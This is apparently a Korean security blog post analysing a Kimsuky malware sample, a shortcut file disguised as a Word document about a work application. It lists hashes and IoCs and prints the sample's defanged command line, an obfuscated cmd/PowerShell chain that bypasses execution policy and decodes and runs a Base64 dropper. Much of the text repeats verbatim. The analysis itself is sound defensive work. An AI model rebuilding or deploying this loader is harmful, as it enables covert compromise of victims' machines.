북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드-근로신청서 관련의 건.docx.lnk(2024.7.9)
Contents
오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 강연의뢰서_근로신청서 관련의 건. docx.lnk(2024.7.9)에 대해 글을 적어 보겠습니다.
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 대상 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체입니다.
뭐~전 세계적으로 유명하니까? 해당 설명은 건너 띄고 해당 악성코드는 근로신청서 관련의 건으로 위장하는 악성코드이며 그냥 보면 워드 파일인 것처럼 보이지만 아이콘을 잘 보면 링크 파일인 것을 확인할 수가 있습니다.
해쉬값
파일명: 근로신청서 관련의 건.docx.lnk
사이즈:17.1 KB
MD5:21d12dc7f08752293847af6ed19df0e3
SHA-1:5074647737b8b996b597c1719b571ccf423a110c
SHA-256:e7e73a5133cd61c077f85c44e9efeb8c24af9f1bfc140be4a2a59fdf33693d0d
PowerShell 코드
StringData { namestring: not present relativepath: not present workingdir: not present commandlinearguments: /c set s=posuiheih(c)ksuehhfhell (&) cal(l) %s:suih(e)ihcksuehhf=w ers% -ep bypass -c $cbaeiufhixdjf='cboauyusgeifu7ih983fef'; $ol=0x00001054;$tl=0x000044 8a;$mviubse='UsIC(R)pKzYpOyRmaT0xMDs(g)ICAgICAgICBmb3IoW2ludF0kc(D00kaSskZmk7ICRwIC1sdC A(o)JGkgKyAkZmkgKyRk(d)1BhdGhMZW4gKyAkZHdEYXRhT(G)VuKTsgJHArKyl7ICRmaWxlW(y)RwXSA9ICRmaW xlWyRwXSAtYnhvciA(k)Ylhvcn07W2J5dGVbXV0kcGF0aE(h)leCA9ICRmaWxlWygkaSskZmkpL(i)4oJGkrJGZ pKyRkd1BhdGhMZW4tM(S)ldOyRwYXRoID0gW1N5c3RlbS5UZXh0Lk(V)uY29kaW5nXTo6QVNDSUkuR2V0U3RyaW 5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRm aWxlIHwgc2VsZWN0IC1Ta2lwI(C)gka(S)skZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgL(V)NraXBMYXN0ICgk ZmlsZVNpem(U)tJGktJGZpLSRkd(1)BhdGhMZW4tJGR3RGF0YUxlbi(k)pKSAtRW5jb2RpbmcgQnl0ZTtpZ(i) gkYlJ1bil7JiRwYXRoO30kaT0kaSskZmk(r)JGR3UGF0aExlbiskZHdEYXRhTGVuO30='; $isncuhef='7ujh 3e8uyh(g)soikjdfsefsef'; $a='JGxua3BhdGggPSBHZXQt(Q)2hpbGRJdGVtICoubG5rIH(w)gd2hlcmUtb 2JqZWN0IHskXy(5)sZW5ndGggLWVxICR0bH0gfCBT(Z)WxlY3QtT2JqZWN0IC1FeHB(h)bmRQcm9wZXJ0eSBOY W1lOyBpZigkb(G)5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3(B)hdGggPSBHZXQtQ2hpbGRJdGVtICRl(b)nY6V EVNUFwqXCoubG5rIHwgd2hlcm(U)tb2JqZWN0IHskXy5sZW5(n)dGggLWVxICR0bH07fTskZ(m)lsZSA9IGdjI CRsbmtwYXRoIC1FbmNvZGl(u)ZyBCeXRlOyAkZmlsZVNpemUg(P)SAkZmlsZS5jb3VudDskaT0(k)b2w7ICAgI CAgICAgICAgICAgI(C)AgIC(A)gICAgICAgICAgICAgICAg(I)CAgICAgICAgICAgICAgd2hpbGUoJGkgLW(x) 0ICRmaWxlU2l6ZSl7JGJ(Y)b3I9JGZpbGVbJGldO(y)RiUnVuPSRmaWxlWyRpKzFdO(y)Rkd1BhdGhMZW(4)9W 2JpdGNvbnZlcnRlcl06OlR(v)SW50MzIoJGZpbGUsICRp(K)zIpOyRkd0RhdGFMZW4(9)W2JpdGNvbnZlcnRlc l(0)6OlRvSW50MzIoJGZpbG';$euhks(j)bdibiwybfkj(s)nsfefcv = [Convert]::FromB(a)se6(4)Str ing($a+$mviubse);$isuhef = -(j)oin ($euhksjbdibiw(y)bfkjsnsfefcv -as [ch(a)r[]]); .('{ 0}{3}{1}{4}{2}'-f 'Inv','ke (-)Exp(r)e','n','o','ss(i)o') $(i)suhef; iconlocation: (.)docx }
악성 PowerShell 코드 분석
Base64 인코딩 된 문자열을 디코딩하여 실행 명령어를 사용하는 것을 볼 수 있습니다.
1. 명령 줄 인수 설정
명령 프롬프터에서 실행할 명령어를 설정하는 부분이며 …
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 대상 공격으로 하는 북한의 해킹 단체 Thallium, APT37과 관련된 해킹 단체입니다.
뭐~전 세계적으로 유명하니까? 해당 설명은 건너 띄고 해당 악성코드는 근로신청서 관련의 건으로 위장하는 악성코드이며 그냥 보면 워드 파일인 것처럼 보이지만 아이콘을 잘 보면 링크 파일인 것을 확인할 수가 있습니다.
해쉬값
파일명: 근로신청서 관련의 건.docx.lnk
사이즈:17.1 KB
MD5:21d12dc7f08752293847af6ed19df0e3
SHA-1:5074647737b8b996b597c1719b571ccf423a110c
SHA-256:e7e73a5133cd61c077f85c44e9efeb8c24af9f1bfc140be4a2a59fdf33693d0d
PowerShell 코드
StringData { namestring: not present relativepath: not present workingdir: not present commandlinearguments: /c set s=posuiheih(c)ksuehhfhell (&) cal(l) %s:suih(e)ihcksuehhf=w ers% -ep bypass -c $cbaeiufhixdjf='cboauyusgeifu7ih983fef'; $ol=0x00001054;$tl=0x000044 8a;$mviubse='UsIC(R)pKzYpOyRmaT0xMDs(g)ICAgICAgICBmb3IoW2ludF0kc(D00kaSskZmk7ICRwIC1sdC A(o)JGkgKyAkZmkgKyRk(d)1BhdGhMZW4gKyAkZHdEYXRhT(G)VuKTsgJHArKyl7ICRmaWxlW(y)RwXSA9ICRmaW xlWyRwXSAtYnhvciA(k)Ylhvcn07W2J5dGVbXV0kcGF0aE(h)leCA9ICRmaWxlWygkaSskZmkpL(i)4oJGkrJGZ pKyRkd1BhdGhMZW4tM(S)ldOyRwYXRoID0gW1N5c3RlbS5UZXh0Lk(V)uY29kaW5nXTo6QVNDSUkuR2V0U3RyaW 5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRm aWxlIHwgc2VsZWN0IC1Ta2lwI(C)gka(S)skZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgL(V)NraXBMYXN0ICgk ZmlsZVNpem(U)tJGktJGZpLSRkd(1)BhdGhMZW4tJGR3RGF0YUxlbi(k)pKSAtRW5jb2RpbmcgQnl0ZTtpZ(i) gkYlJ1bil7JiRwYXRoO30kaT0kaSskZmk(r)JGR3UGF0aExlbiskZHdEYXRhTGVuO30='; $isncuhef='7ujh 3e8uyh(g)soikjdfsefsef'; $a='JGxua3BhdGggPSBHZXQt(Q)2hpbGRJdGVtICoubG5rIH(w)gd2hlcmUtb 2JqZWN0IHskXy(5)sZW5ndGggLWVxICR0bH0gfCBT(Z)WxlY3QtT2JqZWN0IC1FeHB(h)bmRQcm9wZXJ0eSBOY W1lOyBpZigkb(G)5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3(B)hdGggPSBHZXQtQ2hpbGRJdGVtICRl(b)nY6V EVNUFwqXCoubG5rIHwgd2hlcm(U)tb2JqZWN0IHskXy5sZW5(n)dGggLWVxICR0bH07fTskZ(m)lsZSA9IGdjI CRsbmtwYXRoIC1FbmNvZGl(u)ZyBCeXRlOyAkZmlsZVNpemUg(P)SAkZmlsZS5jb3VudDskaT0(k)b2w7ICAgI CAgICAgICAgICAgI(C)AgIC(A)gICAgICAgICAgICAgICAg(I)CAgICAgICAgICAgICAgd2hpbGUoJGkgLW(x) 0ICRmaWxlU2l6ZSl7JGJ(Y)b3I9JGZpbGVbJGldO(y)RiUnVuPSRmaWxlWyRpKzFdO(y)Rkd1BhdGhMZW(4)9W 2JpdGNvbnZlcnRlcl06OlR(v)SW50MzIoJGZpbGUsICRp(K)zIpOyRkd0RhdGFMZW4(9)W2JpdGNvbnZlcnRlc l(0)6OlRvSW50MzIoJGZpbG';$euhks(j)bdibiwybfkj(s)nsfefcv = [Convert]::FromB(a)se6(4)Str ing($a+$mviubse);$isuhef = -(j)oin ($euhksjbdibiw(y)bfkjsnsfefcv -as [ch(a)r[]]); .('{ 0}{3}{1}{4}{2}'-f 'Inv','ke (-)Exp(r)e','n','o','ss(i)o') $(i)suhef; iconlocation: (.)docx }
악성 PowerShell 코드 분석
Base64 인코딩 된 문자열을 디코딩하여 실행 명령어를 사용하는 것을 볼 수 있습니다.
1. 명령 줄 인수 설정
명령 프롬프터에서 실행할 명령어를 설정하는 부분이며 …
IoC
21d12dc7f08752293847af6ed19df0e3
5074647737b8b996b597c1719b571ccf423a110c
e7e73a5133cd61c077f85c44e9efeb8c24af9f1bfc140be4a2a59fdf33693d0d
5074647737b8b996b597c1719b571ccf423a110c
e7e73a5133cd61c077f85c44e9efeb8c24af9f1bfc140be4a2a59fdf33693d0d